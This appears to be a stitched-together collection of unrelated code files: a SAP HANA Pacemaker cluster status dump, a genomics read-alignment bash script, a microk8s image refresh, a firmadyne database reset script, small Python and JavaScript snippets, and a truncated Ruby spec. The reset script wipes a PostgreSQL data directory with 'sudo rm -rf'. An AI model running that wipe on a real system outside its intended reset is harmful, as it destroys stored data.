<lrm_rsc_op id="rsc_ip_PRD_HDB00_last_0" operation_key="rsc_ip_PRD_HDB00_start_0" operation="start" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="7:1:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;7:1:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="25" rc-code="0" op-status="0" interval="0" last-rc-change="1618834290" last-run="1618834290" exec-time="90" queue-time="0" op-digest="6e3bbd07a422997302424264856a2840"/>
<lrm_rsc_op id="rsc_ip_PRD_HDB00_monitor_10000" operation_key="rsc_ip_PRD_HDB00_monitor_10000" operation="monitor" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="8:1:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;8:1:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="26" rc-code="0" op-status="0" interval="10000" last-rc-change="1618834290" exec-time="57" queue-time="0" op-digest="8313e7cc541e6aee1c924e232d7f548b"/>
</lrm_resource>
<lrm_resource id="rsc_SAPHana_PRD_HDB00" type="SAPHana" class="ocf" provider="suse">
<lrm_rsc_op id="rsc_SAPHana_PRD_HDB00_last_failure_0" operation_key="rsc_SAPHana_PRD_HDB00_monitor_0" operation="monitor" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="3:1:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;3:1:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="19" rc-code="0" op-status="0" interval="0" last-rc-change="1618834290" last-run="1618834290" exec-time="2801" queue-time="0" op-digest="ff4ff123bc6f906497ef0ef5e44dffd1"/>
<lrm_rsc_op id="rsc_SAPHana_PRD_HDB00_last_0" operation_key="rsc_SAPHana_PRD_HDB00_promote_0" operation="promote" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="12:6:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;12:6:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="40" rc-code="0" op-status="0" interval="0" last-rc-change="1618834308" last-run="1618834308" exec-time="2347" queue-time="0" op-digest="ff4ff123bc6f906497ef0ef5e44dffd1" op-force-restart=" INSTANCE_PROFILE " op-restart-digest="f2317cad3d54cec5d7d7aa7d0bf35cf8"/>
<lrm_rsc_op id="rsc_SAPHana_PRD_HDB00_monitor_60000" operation_key="rsc_SAPHana_PRD_HDB00_monitor_60000" operation="monitor" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="14:7:8:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:8;14:7:8:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="42" rc-code="8" op-status="0" interval="60000" last-rc-change="1618834314" exec-time="4086" queue-time="0" op-digest="05b857e482ebd46019d347fd55ebbcdb"/>
</lrm_resource>
</lrm_resources>
</lrm>
</node_state>
<node_state id="1084787211" in_ccm="true" crmd="online" crm-debug-origin="do_update_resource" uname="hana02" join="member" expected="member">
<lrm id="1084787211">
<lrm_resources>
<lrm_resource id="stonith-sbd" type="external/sbd" class="stonith">
<lrm_rsc_op id="stonith-sbd_last_0" operation_key="stonith-sbd_monitor_0" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="5:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:7;5:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="5" rc-code="7" op-status="0" interval="0" last-rc-change="1618834616" last-run="1618834616" exec-time="31" queue-time="0" op-digest="265be3215da5e5037d35e7fe1bcc5ae0"/>
</lrm_resource>
<lrm_resource id="rsc_ip_PRD_HDB00" type="IPaddr2" class="ocf" provider="heartbeat">
<lrm_rsc_op id="rsc_ip_PRD_HDB00_last_0" operation_key="rsc_ip_PRD_HDB00_monitor_0" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="6:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:7;6:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="9" rc-code="7" op-status="0" interval="0" last-rc-change="1618834616" last-run="1618834616" exec-time="44" queue-time="0" op-digest="6e3bbd07a422997302424264856a2840"/>
</lrm_resource>
<lrm_resource id="rsc_exporter_PRD_HDB00" type="prometheus-hanadb_exporter@PRD_HDB00" class="systemd">
<lrm_rsc_op id="rsc_exporter_PRD_HDB00_last_0" operation_key="rsc_exporter_PRD_HDB00_monitor_0" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="7:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:7;7:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="13" rc-code="7" op-status="0" interval="0" last-rc-change="1618834616" last-run="1618834616" exec-time="8" queue-time="0" op-digest="f2317cad3d54cec5d7d7aa7d0bf35cf8"/>
</lrm_resource>
<lrm_resource id="rsc_SAPHana_PRD_HDB00" type="SAPHana" class="ocf" provider="suse">
<lrm_rsc_op id="rsc_SAPHana_PRD_HDB00_last_0" operation_key="rsc_SAPHana_PRD_HDB00_monitor_0" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="8:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;8:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="18" rc-code="0" op-status="0" interval="0" last-rc-change="1618834616" last-run="1618834616" exec-time="3035" queue-time="0" op-digest="ff4ff123bc6f906497ef0ef5e44dffd1" op-force-restart=" INSTANCE_PROFILE " op-restart-digest="f2317cad3d54cec5d7d7aa7d0bf35cf8"/>
<lrm_rsc_op id="rsc_SAPHana_PRD_HDB00_last_failure_0" operation_key="rsc_SAPHana_PRD_HDB00_monitor_0" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="8:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;8:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="18" rc-code="0" op-status="0" interval="0" last-rc-change="1618834616" last-run="1618834616" exec-time="3035" queue-time="0" op-digest="ff4ff123bc6f906497ef0ef5e44dffd1"/>
<lrm_rsc_op id="rsc_SAPHana_PRD_HDB00_monitor_61000" operation_key="rsc_SAPHana_PRD_HDB00_monitor_61000" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="17:16:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;17:16:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="24" rc-code="0" op-status="0" interval="61000" last-rc-change="1618834619" exec-time="3645" queue-time="0" op-digest="05b857e482ebd46019d347fd55ebbcdb"/>
</lrm_resource>
<lrm_resource id="rsc_SAPHanaTopology_PRD_HDB00" type="SAPHanaTopology" class="ocf" provider="suse">
<lrm_rsc_op id="rsc_SAPHanaTopology_PRD_HDB00_last_0" operation_key="rsc_SAPHanaTopology_PRD_HDB00_start_0" operation="start" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="28:16:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;28:16:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="25" rc-code="0" op-status="0" interval="0" last-rc-change="1618834619" last-run="1618834619" exec-time="3555" queue-time="0" op-digest="2d8d79c3726afb91c33d406d5af79b53" op-force-restart="" op-restart-digest="f2317cad3d54cec5d7d7aa7d0bf35cf8"/>
<lrm_rsc_op id="rsc_SAPHanaTopology_PRD_HDB00_monitor_10000" operation_key="rsc_SAPHanaTopology_PRD_HDB00_monitor_10000" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="29:16:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;29:16:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="26" rc-code="0" op-status="0" interval="10000" last-rc-change="1618834623" exec-time="3714" queue-time="0" op-digest="64db68ca3e12e0d41eb98ce63b9610d2"/>
</lrm_resource>
</lrm_resources>
</lrm>
<transient_attributes id="1084787211">
<instance_attributes id="status-1084787211">
<nvpair id="status-1084787211-hana_prd_clone_state" name="hana_prd_clone_state" value="DEMOTED"/>
<nvpair id="status-1084787211-master-rsc_SAPHana_PRD_HDB00" name="master-rsc_SAPHana_PRD_HDB00" value="100"/>
<nvpair id="status-1084787211-hana_prd_version" name="hana_prd_version" value="2.00.040.00.1553674765"/>
<nvpair id="status-1084787211-hana_prd_roles" name="hana_prd_roles" value="4:S:master1:master:worker:master"/>
<nvpair id="status-1084787211-hana_prd_sync_state" name="hana_prd_sync_state" value="SOK"/>
</instance_attributes>
</transient_attributes>
</node_state>
</status>
</cib>
EOF
|
#!/bin/bash
MEA_BIN=`dirname $0`
source $MEA_BIN/mea.config
##############################################################################
############# Module 3: allele-specific alignment
##############################################################################

# Parse the command line. "-s" (single-end) expects 7 positional arguments,
# "-p" (paired-end) expects 8; anything else leaves PARAM_VALID=0 so the
# usage text below is printed and the script exits.
PARAM_VALID=1
PARAM_SINGLE_READS=1

case "$1" in
    -s)
        if [ $# -eq 7 ]; then
            PARAM_FASTQ_FILE=$2
            PARAM_GENOME=$3
            PARAM_REFERENCE_GENOME=$4
            PARAM_STRAIN1=$5
            PARAM_STRAIN2=$6
            PARAM_BAM_PREFIX=$7
        else
            PARAM_VALID=0
        fi
        ;;
    -p)
        if [ $# -eq 8 ]; then
            PARAM_SINGLE_READS=0
            PARAM_FASTQ_FILE1=$2
            PARAM_FASTQ_FILE2=$3
            PARAM_GENOME=$4
            PARAM_REFERENCE_GENOME=$5
            PARAM_STRAIN1=$6
            PARAM_STRAIN2=$7
            PARAM_BAM_PREFIX=$8
        else
            PARAM_VALID=0
        fi
        ;;
    *)
        PARAM_VALID=0
        ;;
esac
# Arguments did not parse above: print usage and abort.
# (The usage text is a runtime string and is kept verbatim.)
if [ $PARAM_VALID = 0 ]; then
    echo "
Usage:
mea alignReads <-s/-p> input_reads_1 [input_reads_2] genome_concat reference_genome strain1 strain2 outputPrefix
Options:
-s to align single-end reads (requires one input file)
-p to align paired-end reads (requires two input files)
input_reads_1
the 1st input reads file in fastq.
(fastq.gz or bam is supported when using BWA)
input_reads_2
(paired end) the 2nd input reads file in fastq.
(fastq.gz or bam is supported when using BWA)
genome_concat
path to the indexed reference for concatenated insilico genome.
for BWA, specifiy path to the fasta.
for Bowtie2 and Tophat2, specify path and basename of index files
for Bismark, specify genome folder, excluding <Bisulphite_Genome>
reference_genome
path to the reference genome indices folder
strain1 name of strain1
(e.g. hap1 or CASTEiJ)
strain2 name of strain2
(e.g. hap2 or C57BL6J)
outputPrefix prefix for output files, including the full path, without an extension
(e.g. ./TSC_H3K36me3 )
"
    exit 1
fi
#------------------------------------------------------------------------------------
# detect the allelic reads from the reads aligned to the concatenated genome
#------------------------------------------------------------------------------------
# Extracts, from a SAM aligned against the concatenated (strain1+strain2)
# genome, the reads assigned to one strain, strips the "<strain>_" prefix
# from the reference names, and writes a coordinate-sorted BAM.
#   $1 input SAM file
#   $2 strain name (used as the reference-name prefix)
#   $3 awk MAPQ filter expression, e.g. "== 255"
#   $4 output prefix (produces <prefix>.bam)
function detectAllelicConcatenated {
    printProgress "[detectAllelicConcatenated] Started"

    local PARAM_INPUT_SAM=$1
    local PARAM_STRAIN=$2
    local PARAM_QUALITY=$3
    local PARAM_OUT_PREFIX=$4

    # Output the header first: keep header lines that mention this strain
    # and drop the strain prefix from the sequence names.
    samtools view -H "$PARAM_INPUT_SAM" \
        | awk -v ref="$PARAM_STRAIN" '($0 ~ ref) {print $0}' \
        | sed 's/'"$PARAM_STRAIN"'_//g' \
        > "$PARAM_OUT_PREFIX".sam

    # Append reads whose reference name matches the strain and whose MAPQ
    # (field 5) satisfies the filter expression.
    # FIX: quoted $PARAM_INPUT_SAM (was unquoted, breaking on paths with
    # spaces).
    samtools view "$PARAM_INPUT_SAM" \
        | awk -v ref="$PARAM_STRAIN" '(($3 ~ ref)&&($5'"$PARAM_QUALITY"')) {print $0}' \
        | sed 's/'"$PARAM_STRAIN"'_//g' \
        >> "$PARAM_OUT_PREFIX".sam

    # convert to bam
    samtools view -b "$PARAM_OUT_PREFIX".sam > "$PARAM_OUT_PREFIX".unsorted.bam

    # Sort by coordinates. FIX: the original passed -o "$PARAM_OUT_PREFIX",
    # producing an extensionless output file; the legacy
    # "samtools sort in.bam out_prefix" syntax this was ported from appended
    # ".bam", so the extension is restored here.
    samtools sort "$PARAM_OUT_PREFIX".unsorted.bam -o "$PARAM_OUT_PREFIX".bam

    rm -f "$PARAM_OUT_PREFIX".sam
    rm -f "$PARAM_OUT_PREFIX".unsorted.bam
}
#------------------------------------------------------------------------------------
# alignReads
#------------------------------------------------------------------------------------
# Runs STAR twice (concatenated in-silico genome + plain reference) and then
# splits the concatenated-genome alignment into per-strain BAMs.
# $MEA_STAR_ALN_PARAMS / $MEA_STAR_ALN_TOTAL_PARAMS are intentionally
# unquoted so a value holding several STAR flags word-splits into separate
# arguments.
if [ $PARAM_SINGLE_READS = 1 ]; then
    STAR --runMode alignReads --genomeDir "$PARAM_GENOME" $MEA_STAR_ALN_PARAMS --readFilesIn "$PARAM_FASTQ_FILE"
    mv Aligned.out.sam "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"_"$PARAM_STRAIN2".sam
    mv Log.out "$PARAM_BAM_PREFIX"_STAR_RunParameters.tsv
    mv Log.final.out "$PARAM_BAM_PREFIX"_STAR_AlignmentSummary.tsv

    # Align the same reads to the plain reference for the "total" track.
    STAR --runMode alignReads --genomeDir "$PARAM_REFERENCE_GENOME" $MEA_STAR_ALN_TOTAL_PARAMS --readFilesIn "$PARAM_FASTQ_FILE"
    mv Aligned.out.sam "$PARAM_BAM_PREFIX"_total.sam
    samtools sort "$PARAM_BAM_PREFIX"_total.sam -o "$PARAM_BAM_PREFIX"_total.bam
    samtools index "$PARAM_BAM_PREFIX"_total.bam
    mv Log.out "$PARAM_BAM_PREFIX"_total_STAR_referenceRunParameters.tsv
    mv Log.final.out "$PARAM_BAM_PREFIX"_total_STAR_referenceAlignmentSummary.tsv

    # Split into per-strain BAMs, keeping only uniquely-mapped reads (STAR
    # reports MAPQ 255 for unique alignments).
    # FIX: the original passed an extra "$PARAM_GENOME" argument here, which
    # shifted the quality-filter and output-prefix parameters of
    # detectAllelicConcatenated (the function takes exactly 4 arguments).
    detectAllelicConcatenated "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"_"$PARAM_STRAIN2".sam "$PARAM_STRAIN1" "== 255" "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"
    detectAllelicConcatenated "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"_"$PARAM_STRAIN2".sam "$PARAM_STRAIN2" "== 255" "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN2"
    rm SJ.out.tab Log.progress.out
else #[ $PARAM_SINGLE_READS = 0 ]
    STAR --runMode alignReads --genomeDir "$PARAM_GENOME" $MEA_STAR_ALN_PARAMS --readFilesIn "$PARAM_FASTQ_FILE1" "$PARAM_FASTQ_FILE2"
    mv Aligned.out.sam "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"_"$PARAM_STRAIN2".sam
    mv Log.out "$PARAM_BAM_PREFIX"_STAR_RunParameters.tsv
    mv Log.final.out "$PARAM_BAM_PREFIX"_STAR_AlignmentSummary.tsv

    # FIX: the original passed the literal string "MEA_STAR_ALN_TOTAL_PARAMS"
    # (missing $) as an argument to STAR.
    STAR --runMode alignReads --genomeDir "$PARAM_REFERENCE_GENOME" $MEA_STAR_ALN_TOTAL_PARAMS --readFilesIn "$PARAM_FASTQ_FILE1" "$PARAM_FASTQ_FILE2"
    mv Aligned.out.sam "$PARAM_BAM_PREFIX"_total.sam
    samtools sort "$PARAM_BAM_PREFIX"_total.sam -o "$PARAM_BAM_PREFIX"_total.bam
    samtools index "$PARAM_BAM_PREFIX"_total.bam
    mv Log.out "$PARAM_BAM_PREFIX"_total_STAR_referenceRunParameters.tsv
    mv Log.final.out "$PARAM_BAM_PREFIX"_total_STAR_referenceAlignmentSummary.tsv

    # FIX: spurious "$PARAM_GENOME" argument removed (see single-end branch).
    detectAllelicConcatenated "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"_"$PARAM_STRAIN2".sam "$PARAM_STRAIN1" "== 255" "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"
    detectAllelicConcatenated "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"_"$PARAM_STRAIN2".sam "$PARAM_STRAIN2" "== 255" "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN2"
    rm SJ.out.tab Log.progress.out
fi
|
# Refresh the bot image in microk8s' containerd store from a transferred
# tarball. Expects $PROJECT_NAME and $HOST_TYPE in the environment.
ls ./tmp -l --block-size=MB
# Drop any stale tar left by a previous run: gzip refuses to decompress
# when the target file already exists.
# FIX: variable expansions quoted throughout (word-splitting/globbing
# hazard with unquoted $PROJECT_NAME/$HOST_TYPE).
rm -rf "./tmp/$PROJECT_NAME-bot-$HOST_TYPE.tar"
gzip --decompress "./tmp/$PROJECT_NAME-bot-$HOST_TYPE.tar.gz"
# Replace the old image, then import the new one.
/snap/bin/microk8s ctr image rm "docker.io/$PROJECT_NAME/bot:$HOST_TYPE"
/snap/bin/microk8s ctr image import "./tmp/$PROJECT_NAME-bot-$HOST_TYPE.tar"
#!/bin/bash
set -e

# Recreate the firmadyne "firmware" PostgreSQL database from scratch: wipe
# the cluster data directory, re-initialise it, and load the schema.

# Refuse to run as root; the script escalates selectively via sudo.
if [[ ${USER} == "root" ]]; then
    echo "Please run this script without root privilege."
    exit 1
fi

# Locate the shared configuration (provides DB_DIR, among others).
if [ -e ../configure.sh ]; then
    source ../configure.sh
elif [ -e ./configure.sh ]; then
    source ./configure.sh
else
    echo "Error: Could not find 'configure.sh'!"
    exit 1
fi

sudo systemctl stop postgresql.service
sudo rm -rf /var/lib/postgres/data
sudo mkdir /var/lib/postgres/data
sudo chmod -R 700 /var/lib/postgres/data
sudo chown -R postgres:postgres /var/lib/postgres/data
# FIX: quoted "$LANG" — an empty or space-containing locale value would
# otherwise corrupt initdb's argument list.
sudo -u postgres initdb --locale "$LANG" -E UTF-8 -D '/var/lib/postgres/data'
sudo systemctl start postgresql.service
sudo -u postgres createuser firmadyne -s
sudo -u postgres createdb -O firmadyne -U firmadyne firmware
# FIX: quoted "${DB_DIR}/schema" for the same word-splitting reason.
sudo -u postgres psql -d firmware < "${DB_DIR}/schema"
echo "Database cleared!"
|
def caseFolding(string):
    """Return a case-folded copy of ``string`` for caseless comparison.

    FIX: the function is named caseFolding but used str.lower(), which is
    not Unicode case folding. str.casefold() behaves identically on ASCII
    input while also handling cases such as German 'ß' -> 'ss'.
    """
    return string.casefold()

print(caseFolding("This Is A Test!"))  # this is a test!
def fibonacci(limit):
    """Print the first ``limit`` Fibonacci numbers, space-separated,
    starting from 0, without a trailing newline."""
    previous, current = 0, 1
    emitted = 0
    while emitted < limit:
        print(previous, end=' ')
        previous, current = current, previous + current
        emitted += 1

fibonacci(10)
import * as types from '../types/languages';
/** Action signalling that the languages fetch has started. */
export function startFetchLanguage() {
  return {
    type: types.FETCH_LANGUAGES_STARTED,
    payload: {},
  };
}

/**
 * Action signalling that the languages fetch completed.
 * @param {*} languages - fetched languages, stored as the payload
 */
export function finishFetchLanguage(languages) {
  return {
    type: types.FETCH_LANGUAGES_FINISHED,
    payload: languages,
  };
}

/**
 * Action signalling that the languages fetch failed.
 * @param {*} error - error stored as the payload
 */
export function failFetchLanguage(error) {
  return {
    type: types.FETCH_LANGUAGES_FAILED,
    payload: error,
  };
}
|
class WebAppStrategy:
    """Abstract interface for web-app metadata and path lookups.

    Concrete strategies must override every method; each base method only
    raises NotImplementedError.
    """

    def get_app_name(self):
        """Return the application's display name."""
        raise NotImplementedError

    def get_manifest_json(self):
        """Return the app manifest as a dictionary."""
        raise NotImplementedError

    def get_store_path(self, relative_path=''):
        """Return the store path, extended by ``relative_path``."""
        raise NotImplementedError

    def get_root_path(self, relative_path=''):
        """Return the root path, extended by ``relative_path``."""
        raise NotImplementedError

    def get_app_base_url(self):
        """Return the app's base URL."""
        raise NotImplementedError


class ConcreteWebAppStrategy(WebAppStrategy):
    """Default strategy returning hard-coded application metadata."""

    def get_app_name(self):
        """Return the fixed app name."""
        return "MyWebApp"

    def get_manifest_json(self):
        """Return the fixed manifest dictionary."""
        return {"name": "MyWebApp", "version": "1.0"}

    def get_store_path(self, relative_path=''):
        """Return the store path with ``relative_path`` appended verbatim."""
        store_base = "/path/to/store"
        return store_base + relative_path

    def get_root_path(self, relative_path=''):
        """Return the root path with ``relative_path`` appended verbatim."""
        root_base = "/path/to/root"
        return root_base + relative_path

    def get_app_base_url(self):
        """Return the fixed base URL."""
        return "https://www.mywebapp.com"
require File.dirname(__FILE__) + '/../spec_helper'
include PoolParty::Cloud
include PoolParty::Resources
# Minimal fixture used by the specs below: registers a :test_service plugin
# via the PoolParty plugin DSL. Its enable step declares a single file
# resource at /etc/poolparty/lobos (presumably exercised by plugin-related
# expectations elsewhere in the suite — confirm against the full spec file).
class TestServiceClass
  plugin :test_service do
    def enable
      has_file(:name => "/etc/poolparty/lobos")
    end
  end
end
describe "Cloud" do
before(:each) do
setup
reset_resources!
end
describe "wrapped" do
before(:each) do
@obj = Object.new
@pool = pool :just_pool do; end
end
it "should respond to the pool method outside the block" do
@obj.respond_to?(:cloud).should == true
end
describe "global" do
before(:each) do
@cloud1 = cloud :pop do;end
end
it "should store the cloud in the global list of clouds" do
@obj.clouds.has_key?(:pop).should == true
end
it "should store the cloud" do
@obj.cloud(:pop).should == @cloud1
end
it "should have set the using base on intantiation to ec2" do
@cloud1.using_remoter?.should_not == nil
end
it "should say the remoter_base is ec2 (by default)" do
@cloud1.remote_base.should == PoolParty::Ec2
end
end
it "should return the cloud if the cloud key is already in the clouds list" do
@cld = cloud :pop do;end
@pool.cloud(:pop).should == @cld
end
describe "options" do
before(:each) do
reset!
setup
@p = pool :options do
minimum_instances 100
access_key "access_key"
cloud :apple do
access_key "cloud_access_key"
end
end
@c = @p.cloud(:apple)
end
it "should be able to grab the cloud from the pool" do
@c.should == @p.cloud(:apple)
end
it "should take the options set on the pool" do
@p.minimum_instances.should == 100
end
it "should take the access_key option set from the cloud" do
@c.access_key.should == "cloud_access_key"
end
end
describe "block" do
before(:each) do
reset!
@cloud = Cloud.new(:test, @pool) do
# Inside cloud block
keypair "fake_keypair"
end
@cloud.stub!(:plugin_store).and_return []
end
it "should be able to pull the pool from the cloud" do
@cloud.parent == @pool
end
it "should have the outer pool listed as the parent of the inner cloud" do
@pool = pool :knick_knack do
cloud :paddy_wack do
end
end
cloud(:paddy_wack).parent.should == pool(:knick_knack)
end
it "should have services in an array" do
@cloud.services.class.should == Array
end
it "should have no services in the array when there are no services defined" do
@cloud.services.size.should == 0
end
it "should respond to a configure method" do
@cloud.respond_to?(:configure).should == true
end
describe "configuration" do
before(:each) do
reset!
@cloud2 = Cloud.new(:test, @pool) do
minimum_instances 1
maximum_instances 2
end
end
it "should be able to se the minimum_instances without the var" do
@cloud2.minimum_instances.should == 1
end
it "should be able to se the maximum_instances with the =" do
@cloud2.maximum_instances.should == 2
end
end
describe "options" do
it "should set the minimum_instances to 2" do
@cloud.minimum_instances.should == 2
end
it "should set the maximum_instances to 5" do
@cloud.maximum_instances.should == 5
end
it "should be able to set the minimum instances" do
@cloud.minimum_instances 3
@cloud.minimum_instances.should == 3
end
it "should be able to take a hash from configure and convert it to the options" do
@cloud.configure( {:minimum_instances => 1, :maximum_instances => 10, :keypair => "friend"} )
@cloud.keypair.should == "friend"
end
# `instances 8..15` is sugar that sets both bounds from a Range.
describe "minimum_instances/maximum_instances as a range" do
before(:each) do
reset!
@pool = pool :just_pool do
cloud :app do
instances 8..15
end
end
@cloud = @pool.cloud(:app)
end
it "should set the minimum based on the range" do
@cloud.minimum_instances.should == 8
end
it "should set the maximum based on the range set by instances" do
@cloud.maximum_instances.should == 15
end
end
# Keypair resolution order: explicit on the cloud, else inherited from the
# pool, else generated as "<pool>_<cloud>".
describe "keypair" do
before(:each) do
reset!
end
it "should be able to define a keypair in the cloud" do
@c = cloud :app do
keypair "hotdog"
end
@c.keypair.should == "hotdog"
end
it "should take the pool parent's keypair if it's defined on the pool" do
pool :pool do
keypair "ney"
cloud :app do
end
cloud :group do
end
end
pool(:pool).cloud(:app).keypair.should == "ney"
pool(:pool).cloud(:group).keypair.should == "ney"
end
it "should generate a keypair based on the cloud name if none is defined" do
pool :pool do
cloud :app do
end
cloud :nickes do
end
end
pool(:pool).cloud(:app).keypair.should == "pool_app"
pool(:pool).cloud(:nickes).keypair.should == "pool_nickes"
end
end
describe "Manifest" do
# Seed the cloud with a file, a gem package and a package resource so the
# generated manifest has something to render.
before(:each) do
reset!
stub_list_from_remote_for(@cloud)
@cloud.instance_eval do
has_file(:name => "/etc/httpd/http.conf") do
content <<-EOE
hello my lady
EOE
end
has_gempackage(:name => "poolparty")
has_package(:name => "dummy")
end
end
# Typo fix in the example name: dropped the duplicated "should it should".
it "should have the method build_manifest" do
@cloud.respond_to?(:build_manifest).should == true
end
it "should make a new 'haproxy' class" do
@cloud.stub!(:realize_plugins!).and_return true
PoolPartyHaproxyClass.should_receive(:new).once
@cloud.add_poolparty_base_requirements
end
# NOTE(review): the name says "3 resources" but the assertion is `> 2`.
it "should have 3 resources" do
@cloud.add_poolparty_base_requirements
@cloud.number_of_resources.should > 2
end
it "should receive add_poolparty_base_requirements before building the manifest" do
@cloud.should_receive(:add_poolparty_base_requirements).once
@cloud.build_manifest
end
# Verifies that add_poolparty_base_requirements instantiates the heartbeat
# plugin (resolved via String#class_constant) and attaches it to the cloud.
describe "add_poolparty_base_requirements" do
before(:each) do
reset!
# Clear any previously memoized heartbeat on the cloud instance.
@cloud.instance_eval do
@heartbeat = nil
end
@hb = "heartbeat".class_constant.new(@cloud)
@cloud.stub!(:realize_plugins!).and_return []
end
it "should call initialize on heartbeat (in add_poolparty_base_requirements)" do
@cloud.stub!(:realize_plugins!).and_return []
@hb.class.should_receive(:new).and_return true
@cloud.add_poolparty_base_requirements
end
it "should call heartbeat on the cloud" do
@cloud.should_receive(:heartbeat).and_return true
@cloud.add_poolparty_base_requirements
end
it "should call Hearbeat.new" do
"heartbeat".class_constant.should_receive(:new).and_return @hb
@cloud.add_poolparty_base_requirements
end
it "should call enable on the plugin call" do
@hb = "heartbeat".class_constant
"heartbeat".class_constant.stub!(:new).and_return @hb
@cloud.add_poolparty_base_requirements
@cloud.heartbeat.should == @hb
end
# State of the cloud after the requirements have actually been added.
describe "after adding" do
before(:each) do
stub_list_from_remote_for(@cloud)
@cloud.add_poolparty_base_requirements
end
it "should add resources onto the heartbeat class inside the cloud" do
@cloud.services.size.should > 0
end
it "should store the class heartbeat" do
@cloud.services.map {|a| a.class}.include?("heartbeat".class_constant).should == true
end
it "should have an array of resources on the heartbeat" do
@cloud.services.first.resources.class.should == Hash
end
# Resource lookup on a service attached via the DSL (test_service).
describe "resources" do
before(:each) do
@cloud8 = Cloud.new(:tester, @pool) do
test_service
end
@service = @cloud8.services.first
@files = @service.resource(:file)
end
it "should have a file resource" do
@files.first.nil?.should == false
end
it "should have an array of lines" do
@files.class.should == Array
end
it "should not be empty" do
@files.should_not be_empty
end
end
end
end
# Manifest generation: the rendered string must contain the resources seeded
# in the outer before block plus the base poolparty requirements.
describe "building" do
before(:each) do
# NOTE(review): removed an unused local (`str`) that was assigned but never read.
@sample_instances_list = [{:ip => "192.168.0.1", :name => "master"}, {:ip => "192.168.0.2", :name => "node1"}]
@ris = @sample_instances_list.map {|h| PoolParty::Remote::RemoteInstance.new(h, @cloud) }
stub_remoter_for(@cloud)
@manifest = @cloud.build_manifest
end
it "should return a string when calling build_manifest" do
@manifest.class.should == String
end
it "should have a comment of # file in the manifest as described by the has_file" do
@manifest.should =~ /file \{/
end
it "should have the comment of a package in the manifest" do
@manifest.should =~ /package \{/
end
it "should have the comment for haproxy in the manifest" do
@manifest.should =~ /haproxy/
end
it "should include the poolparty gem" do
@manifest.should =~ /package \{/
end
it "should include custom functions" do
@manifest.should =~ /define line\(\$file/
end
end
# prepare_for_configuration is invoked from after(:each) at the bottom of
# this group, so each example only sets up its message expectations.
describe "prepare_for_configuration" do
before(:each) do
@cloud.stub!(:copy_ssh_key).and_return true
@cloud.stub!(:before_configuration_tasks).and_return []
end
it "should make_base_directory" do
@cloud.should_receive(:make_base_directory).at_least(1)
end
it "should copy_misc_templates" do
@cloud.should_receive(:copy_misc_templates).once
end
describe "copy_custom_templates" do
it "should receive copy_custom_templates" do
@cloud.should_receive(:copy_custom_templates).once
end
it "test to see if the directory Dir.pwd/templates exists" do
::File.should_receive(:directory?).with("#{Dir.pwd}/templates").and_return false
::File.stub!(:directory?).and_return true
@cloud.copy_custom_templates
end
it "copy each file to the template directory" do
Dir.stub!(:[]).with("#{Dir.pwd}/templates/*").and_return ["pop"]
::File.stub!(:directory?).with("#{Dir.pwd}/templates").and_return true
::File.stub!(:directory?).and_return true
